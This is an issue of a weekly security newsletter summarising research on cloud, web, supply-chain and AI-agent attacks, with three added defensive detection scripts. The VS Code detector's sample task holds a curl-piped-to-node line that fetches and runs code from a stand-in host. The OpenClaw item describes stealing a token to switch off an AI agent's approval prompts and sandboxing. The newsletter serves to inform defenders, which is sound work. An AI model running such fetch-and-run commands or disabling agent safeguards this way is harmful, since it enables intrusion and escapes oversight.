Release Date: 9th February 2026 | Issue: 58

The Security Pills newsletter is a hand-curated zine (delivered once per week) that highlights security-related news. 10+ hours of reading and analysis condensed into a 5-minute summary every Monday morning.

Sponsor
Would you like to become a sponsor for our newsletter? Our mission is to highlight security-related news with a focus on quality content, while helping people stay up to date with this corner of the industry. If you are interested, reach out to [email protected] with your ad idea to get started!

Application Security

Jerry Gamblin publishes GhostCVEs, a tool that finds vulnerability identifiers mentioned in public sources but missing from official CVE databases. The platform scans GitHub commits, security advisories, and RSS feeds to collect CVE references, then checks them against local copies of NVD and MITRE databases to spot gaps. It runs automated scans every six hours and creates reports in various formats. The system stores historical data in an SQLite database and plans to add features for detecting fake or AI-generated CVE mentions.

Wiz's Gal Nagli details an exposed Supabase API key in client-side JavaScript without Row Level Security protections. The misconfiguration granted unauthenticated access to the entire production database, exposing 1.5 million API authentication tokens, 35,000 email addresses, and private messages containing unencrypted third-party API keys. Write access to the database allowed unauthenticated modification of posts and injection of malicious content. The exposure revealed that the platform's 1.5 million agents were controlled by only 17,000 human users (88:1 ratio), contradicting its positioning as an autonomous AI-native social network.

The incident demonstrates a growing problem: AI-powered development tools make building software much easier, but developers often skip essential security practices in the process.

PortSwigger's 19th annual Top 10 Web Hacking Techniques, curated from 63 community nominations, was won by Vladislav Korchagin's Successful Errors, introducing error-based techniques for exploiting blind server-side template injection with polyglot detection methods.

The list highlighted the rise of side channels as a core exploitation primitive, featuring two XS-Leak entries alongside ORM-based data extraction, Unicode normalization attacks, Next.js internal cache poisoning, HTTP/2 CONNECT abuse, a technique for making blind SSRF visible, SOAP deserialization chains leading to RCE, and parser differentials.

Artificial Intelligence

Built by Simon Willison, Claude Code Transcripts is a command-line tool that converts Claude AI coding session files into readable, paginated HTML documents. The tool can process sessions from three sources: local files stored on your computer, web sessions accessed through Claude's API, or individual JSON files. It creates organized output with index pages and multi-page transcripts that work well on mobile devices. Users can customize where files are saved, automatically upload results to GitHub Gist for sharing, and include original session data for archival purposes.

Praetorian's Evan Leleux released Julius, an open-source tool that identifies LLM server software running on network endpoints, addressing the growing shadow AI problem of thousands of unauthenticated inference servers exposed on the internet. Julius distinguishes between platforms like Ollama, vLLM, and Hugging Face deployments using YAML-based probes.

A persistent memory system for Claude Code that maintains project context across sessions through automatic observation capture and semantic summarization. It employs a token-efficient 3-layer search workflow combining full-text queries, chronological context retrieval, and selective detail fetching.

Jimmy Vo explores task management for agentic coding, comparing his custom tk CLI tool with Anthropic's native Claude Code tasks. His approach uses a bash script that stores tickets as markdown files in .tickets/, paired with a Claude skill and project manager agent that generates tickets from RFCs and tracks dependencies. Anthropic's solution evolved from simple todos to structured JSON-based dependency graphs. Both give AI agents structured task tracking and dependency awareness.

Blue Team

Datadog's Ryan Simon identified a campaign that hijacked web traffic through malicious NGINX configuration injection, likely gaining initial access via React2Shell exploitation (CVE-2025-55182). Attackers deployed shell scripts that discovered NGINX installations, including Baota panel environments, and injected malicious location blocks routing requests through attacker-controlled proxies, validating syntax and using graceful reloads to avoid disruption.

The campaign targeted Asian TLDs, government and educational domains, and generic TLDs, each mapped to different attacker backends and gambling-related URL paths, while exfiltrating hijacked domain mappings to C2 infrastructure.
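Because the injected location blocks were syntactically valid and reloaded gracefully, the most reliable signal a defender has is the proxy_pass target itself: a location block that forwards traffic to a host the operator never configured. The following audit script is an added example, not Datadog's tooling or the campaign's code. It assumes a plain-text NGINX config, a constructed sample containing one legitimate and one injected location block, and an operator-supplied allow-list of upstream hosts; anything outside that allow-list is reported.

```python
"""Audit NGINX location blocks for proxy_pass targets outside an allow-list.

Added illustration (not from the original article). Assumes the config is
plain text and that an unexpected proxy_pass host is the signal of interest.
"""
import re
from urllib.parse import urlparse

# Constructed sample config: one legitimate reverse proxy to a local service
# and one injected block that routes selected paths to an external host.
SAMPLE_CONF = """
server {
    listen 80;
    server_name example.edu;

    location / {
        root /var/www/html;
    }

    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }

    location ~* ^/(casino|slots)/ {
        proxy_pass http://203.0.113.10:8443;
        proxy_set_header Host $host;
    }
}
"""

LOCATION_RE = re.compile(r'location\s+([^{]+?)\s*\{')
PROXY_RE = re.compile(r'proxy_pass\s+([^;]+);')


def extract_locations(conf: str):
    """Return (matcher, body) for each location block, walking nested braces."""
    blocks = []
    for m in LOCATION_RE.finditer(conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {'{': 1, '}': -1}.get(conf[i], 0)
            i += 1
        blocks.append((m.group(1).strip(), conf[m.end():i - 1]))
    return blocks


def proxy_hosts(body: str):
    """Extract the host of every proxy_pass directive in a block body."""
    hosts = []
    for target in PROXY_RE.findall(body):
        target = target.strip()
        if target.startswith(('http://', 'https://')):
            hosts.append(urlparse(target).hostname)
        else:
            # upstream group name or unix: socket; report verbatim
            hosts.append(target)
    return hosts


def audit(conf: str, allowed_hosts):
    """Return (location matcher, host) for every proxy_pass host not allow-listed."""
    findings = []
    for matcher, body in extract_locations(conf):
        for host in proxy_hosts(body):
            if host not in allowed_hosts:
                findings.append((matcher, host))
    return findings


if __name__ == "__main__":
    for matcher, host in audit(SAMPLE_CONF, {"127.0.0.1"}):
        print(f"unexpected proxy_pass target {host} in location {matcher}")
```

Run it against each config file nginx -T reports as included, and treat the allow-list as part of the server's configuration management so a diff from it is alertable. The check covers only proxy_pass; blocks that redirect via return or rewrite, or pull in attacker-written files through include, need their own rules.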

Clawdstrike provides runtime security enforcement for agent-based systems and EDR development on OpenClaw. It features seven security guards, multi-layer jailbreak detection, output sanitization, and cryptographically signed audit trails.

Google's Threat Intelligence Group disrupted IPIDEA, one of the world's largest residential proxy networks, which operated through four SDK brands sharing ~7,400 proxy servers. The network embedded these SDKs into 600+ Android apps and 3,075 Windows programs, silently turning devices into proxy exit nodes. IPIDEA also controlled 13 proxy/VPN brands and facilitated botnets including BadBox2.0, Aisuru, and Kimwolf. In a single week, 550+ tracked threat groups from China, DPRK, Iran, and Russia were observed using IPIDEA for SaaS compromise and password spraying.

Van Vleet proposes extending the TTP framework with a fourth layer, Instances, creating TTPI. The current model mixes abstract patterns (procedures) with real-world examples (instances). Procedures are stable recipes; instances are the ever-changing dishes made from them.

This distinction helps teams prioritize detection: blocking procedures forces attackers into a limited playbook, while chasing individual instances leads to an endless cycle where attackers generate new variations faster than defenders can respond.

Cloud Security

Dropkit is a command-line tool for managing DigitalOcean droplet lifecycles with automated SSH configuration and Tailscale VPN integration. It enables cost optimization through hibernation, snapshotting and destroying droplets to stop billing while preserving state for restoration.

Sebastian Toader presents Riptides, a platform that replaces long-lived OpenAI API keys with short-lived credentials through an identity-first architecture. It verifies workload identity using SPIFFE standards, exchanges identity tokens for temporary keys via Vault or OpenBao, and enforces access at the kernel level through a custom Linux sysfs file. Credentials default to 15-minute TTLs and are automatically revoked, letting developers retrieve keys via simple file reads without embedding Vault SDKs.

Omer Amiad discovered GatewayToHeaven (CVE-2025-13292), a cross-tenant vulnerability in Google Cloud's Apigee allowing read and write access to analytics data across all tenants, potentially enabling end-user impersonation across any organization using the service.

The attack began by targeting the GKE metadata endpoint through an Apigee API proxy, bypassing SSRF protections via the AssignMessage policy to obtain the Message Processor's service account token. That token's bucket write permissions allowed replacing Dataflow pipeline JARs with malicious code, then triggering autoscaling via PubSub floods to execute them. The resulting Dataflow service account had cross-tenant access to metadata buckets and GCS datastores containing request logs with plaintext access tokens for all Apigee customers.

Container Security

Trail of Bits has released a containerized development environment that allows Claude AI to execute commands freely while keeping your main system safe. The tool uses Docker containers to create isolated workspaces where Claude can run unrestricted operations during security audits and code reviews. Users can choose between single-project containers or shared workspaces for multiple repositories. For sensitive work, network access can be restricted using firewall rules. The system works with both command-line tools and popular IDEs, with specific performance tweaks available for Mac users running Apple Silicon processors.

Palantir outlines five security dimensions for deploying AI agents in production. Scalable model access is provided through regional hubs with guarantees that no data is retained by third-party providers. Agent orchestration runs on ephemeral Kubernetes infrastructure with 48-hour node limits and a three-factor permission model combining owner, service user, and delegated user rights. Memory governance unifies four modalities (working, episodic, semantic, and procedural) through their Ontology system, applying consistent marking and role-based policies at runtime. Tool usage is secured through provenance-based controls that resolve entire call chains at runtime, blocking unauthorized data flows across nested tools. Integrated observability traces agent activity from data to decision, linking queries to version histories and LLM functions to evaluation suites.

Red Team

Rafael Castilho found reflected XSS in Salesforce Commerce Cloud's EinsteinCarousel-Load controller, bypassed Cloudflare WAF using Unicode escapes, then weaponized the WAF to block OAuth callbacks and intercept one-time authentication codes for account takeover.

Depthfirst's Mav Levin chained two vulnerabilities in OpenClaw into a 1-click RCE exploit. First, a logic flaw discovered by Depthfirst's automated scanning: clicking a URL with a malicious gatewayUrl parameter forces OpenClaw to connect to an attacker-controlled server and leak the user's auth token during the handshake. Second, a missing WebSocket origin validation that Levin discovered, enabling Cross-Site WebSocket Hijacking to reach the victim's localhost OpenClaw instance from a malicious webpage. With the stolen admin-scoped token, the attacker disables safety features (user approval prompts and container sandboxing) via the API and executes arbitrary commands on the host, all without user interaction beyond the initial click.

Supply Chain

DNSimple transformed GitHub repository management from manual configuration to automated infrastructure as code using Terraform. An initial Ruby tool (Repocop) failed because it required local execution with no review process or change tracking. The breakthrough came in 2024 when GitHub Actions and Terraform Cloud enabled a PR based workflow where proposed changes generated preview plans automatically and approved merges triggered deployment, no local Terraform required. Starting with basic settings, they expanded to templates, code ownership files, and configurations across hundreds of repositories, later adopting the same pattern for DNS, cloud, and server infrastructure.

Sysdig's Alberto Pellitteri analyzed how the Shai-Hulud worm weaponized self-hosted GitHub Actions runners as persistent backdoors. After compromising machines through trojanized NPM packages, the worm created repositories with discussions enabled, installed runners with root privileges in hidden directories, and used an intentionally vulnerable workflow as a C2 channel, executing commands posted as discussion comments. Persistence was achieved by disabling process cleanup and optionally installing the runner as a system service. All traffic flowed to github.com, evading traditional network defenses.

Block built BinauthZ, a plugin for their existing admission controller that cryptographically verifies container images are signed and come from trusted build pipelines before running in Kubernetes. Verification rules are configuration-driven, and the plugin handles scale through concurrent verification and layered caching while distinguishing real policy violations from temporary infrastructure issues. Block built this in-house to avoid operational complexity, vendor lock-in, and per-node pricing.

OpenClaw skills in the ClawHub marketplace are being exploited as malware delivery vectors, with VirusTotal identifying hundreds of malicious packages among 3,016+ analyzed. These attacks weaponize setup workflows that instruct users to execute untrusted code; because the skill files themselves are nearly empty, traditional antivirus fails to detect them.

VirusTotal's Code Insight surfaces these patterns by analyzing SKILL.md behavior. Notable case: user "hightower6eu" published 314+ malicious skills delivering Windows packed trojans and macOS Atomic Stealer (AMOS), which harvests passwords, browser credentials, and crypto wallets.

Chainguard's Adrian Mouat shows how to eliminate long-lived GitHub Personal Access Tokens when running Renovate as a GitHub Action by using Octo STS, an open-source security token service built by Chainguard that exchanges the action's OIDC token for a short-lived GitHub token whose permissions are defined in a per-repository YAML policy file. This also addresses the default GitHub Action token's inability to update workflow files.

Threat Hunting

Jamf Threat Labs' Thijs Xhaflaire uncovered a North Korean campaign abusing Visual Studio Code's task configuration to deliver malware, extending the "Contagious Interview" operation. Victims clone malicious GitHub or GitLab repositories and, upon trusting the workspace in VS Code, unknowingly execute commands embedded in tasks.json that fetch JavaScript payloads from Vercel infrastructure.

The payload establishes a persistent backdoor that beacons to a command server every five seconds, enabling remote code execution while collecting system details such as hostname, MAC addresses, and public IP for victim fingerprinting. Jamf recommends developers scrutinize repository contents and task configurations before granting workspace trust.
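The mechanism Jamf describes relies on a documented VS Code feature: a task whose runOptions.runOn is set to "folderOpen" executes as soon as a trusted workspace opens. Reviewing tasks.json before granting trust can be automated. The script below is an added example, not Jamf's tooling or the campaign's payload; it assumes the standard tasks.json layout (version 2.0.0 with a "tasks" array), strips whole-line // comments since VS Code accepts JSONC, and uses a constructed sample containing one ordinary build task and one auto-run task that pipes a remote download into an interpreter.

```python
"""Flag VS Code tasks that auto-run on folder open, especially ones fetching
remote content. Added illustration, not from the original article.
Assumes the standard tasks.json schema; args are treated as strings.
"""
import json
import re

# Constructed sample tasks.json (not taken from any real repository).
SAMPLE_TASKS_JSON = r'''
{
  // comments are legal in VS Code's JSONC; whole-line ones are stripped below
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/payload.js | node",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
'''

# Downloaders commonly seen in one-liners that pull a second stage.
REMOTE_FETCH_RE = re.compile(r'\b(curl|wget|Invoke-WebRequest|iwr)\b', re.I)


def load_tasks(text: str):
    """Parse tasks.json after removing whole-line // comments (assumption:
    inline comments and trailing commas are not handled)."""
    cleaned = re.sub(r'^\s*//.*$', '', text, flags=re.M)
    return json.loads(cleaned).get("tasks", [])


def audit_tasks(text: str):
    """Return (label, reason) findings for tasks that warrant a look before
    trusting the workspace."""
    findings = []
    for task in load_tasks(text):
        label = task.get("label", "<unnamed>")
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        if not auto:
            continue  # only auto-run tasks execute without a user action
        command = " ".join([str(task.get("command", ""))]
                           + [str(a) for a in task.get("args", [])])
        hidden = task.get("presentation", {}).get("reveal") == "never"
        findings.append((label, "runs automatically on folder open"))
        if REMOTE_FETCH_RE.search(command):
            findings.append((label, "auto-run task fetches remote content"))
        if hidden:
            findings.append((label, "auto-run task hides its terminal output"))
    return findings


if __name__ == "__main__":
    for label, reason in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[{label}] {reason}")
```

Any auto-run task deserves manual review, but the combination of folderOpen, a downloader, and a hidden terminal is the shape described in the writeup and is worth a hard block in a pre-clone or pre-trust hook. VS Code's own setting to disable automatic tasks is the complementary control on the workstation side.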

Rapid7 researchers Jan Blažek and Calvin House found threat actors leveraging AWS WorkMail to sidestep SES sandbox restrictions and build phishing infrastructure. Using compromised AWS credentials, attackers escalated to AdministratorAccess, created WorkMail organizations via workmail:CreateOrganization, and verified domains through ses:VerifyDomainIdentity and ses:VerifyDomainDkim. By pivoting to WorkMail rather than requesting SES sandbox removal, they gained immediate external sending to up to 100,000 recipients per day per organization, far exceeding the sandbox limit of 200 messages daily to verified recipients.

This technique makes web-sent emails appear in CloudTrail as ses:SendRawEmail events but masks the sender's real IP behind workmail..amazonaws.com, while SMTP-sent emails produce no CloudTrail logs at all, even with SES data events enabled.
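Since the SMTP path leaves no CloudTrail trace, the setup calls (workmail:CreateOrganization, ses:VerifyDomainIdentity, ses:VerifyDomainDkim) are the more dependable signal; the API path additionally shows up as SendRawEmail events whose source address is a WorkMail service hostname rather than a client IP. The detection below is an added example, not Rapid7's rule set. It runs over constructed CloudTrail-shaped records (the account ID, ARNs and IPs are placeholders) and assumes that an operator can supply the set of principals expected to create or send mail; the exact WorkMail hostname format in sourceIPAddress is an assumption, so the check keys on "hostname ending in .amazonaws.com instead of an IP".

```python
"""Detect WorkMail-backed SES abuse in CloudTrail records.

Added illustration, not from the original research. Field names follow the
CloudTrail record schema; the sample events are constructed, not real logs.
"""
from ipaddress import ip_address

# Constructed records: a CI principal standing up WorkMail and verifying a
# domain, then an API send whose source is a service hostname. The last
# record is a legitimate send from an application role with a client IP.
SAMPLE_EVENTS = [
    {"eventSource": "workmail.amazonaws.com", "eventName": "CreateOrganization",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "sourceIPAddress": "198.51.100.7", "awsRegion": "us-east-1"},
    {"eventSource": "ses.amazonaws.com", "eventName": "VerifyDomainIdentity",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "sourceIPAddress": "198.51.100.7", "awsRegion": "us-east-1"},
    {"eventSource": "ses.amazonaws.com", "eventName": "SendRawEmail",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"},
     "sourceIPAddress": "workmail.us-east-1.amazonaws.com",  # assumed form
     "awsRegion": "us-east-1"},
    {"eventSource": "ses.amazonaws.com", "eventName": "SendRawEmail",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/app-mailer"},
     "sourceIPAddress": "10.0.4.12", "awsRegion": "us-east-1"},
]

# Calls named in the writeup that build sending infrastructure.
SETUP_EVENTS = {"CreateOrganization", "VerifyDomainIdentity", "VerifyDomainDkim"}


def is_service_hostname(source: str) -> bool:
    """True when sourceIPAddress is an AWS service hostname, not a client IP."""
    try:
        ip_address(source)
        return False
    except ValueError:
        return source.endswith(".amazonaws.com")


def detect(events, mail_principals):
    """Return (eventName, principal ARN, reason) findings.

    mail_principals: ARNs expected to manage or send mail; everything else
    performing setup calls, and any send proxied through a service hostname,
    is reported.
    """
    findings = []
    for event in events:
        name = event.get("eventName", "")
        arn = event.get("userIdentity", {}).get("arn", "")
        source = event.get("sourceIPAddress", "")
        if name in SETUP_EVENTS and arn not in mail_principals:
            findings.append((name, arn, "mail infrastructure created by unexpected principal"))
        if name == "SendRawEmail" and is_service_hostname(source):
            findings.append((name, arn, f"send proxied via {source}; client IP not recorded"))
    return findings


if __name__ == "__main__":
    for name, arn, reason in detect(SAMPLE_EVENTS, {"arn:aws:iam::123456789012:role/app-mailer"}):
        print(f"{name} by {arn}: {reason}")
```

Because SMTP sends never reach CloudTrail, pair this with SES sending statistics or billing anomalies to catch volume from a WorkMail organization that was stood up by a compromised principal; the CloudTrail rule alone confirms the setup, not the ongoing abuse.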

Wrapping Up


If you enjoyed this newsletter and think others would too, it would mean a lot to us if you'd forward this email to other people who may enjoy it as well. You can also reply to this email; I'd love to get in touch with you.

Thanks,
Sebas
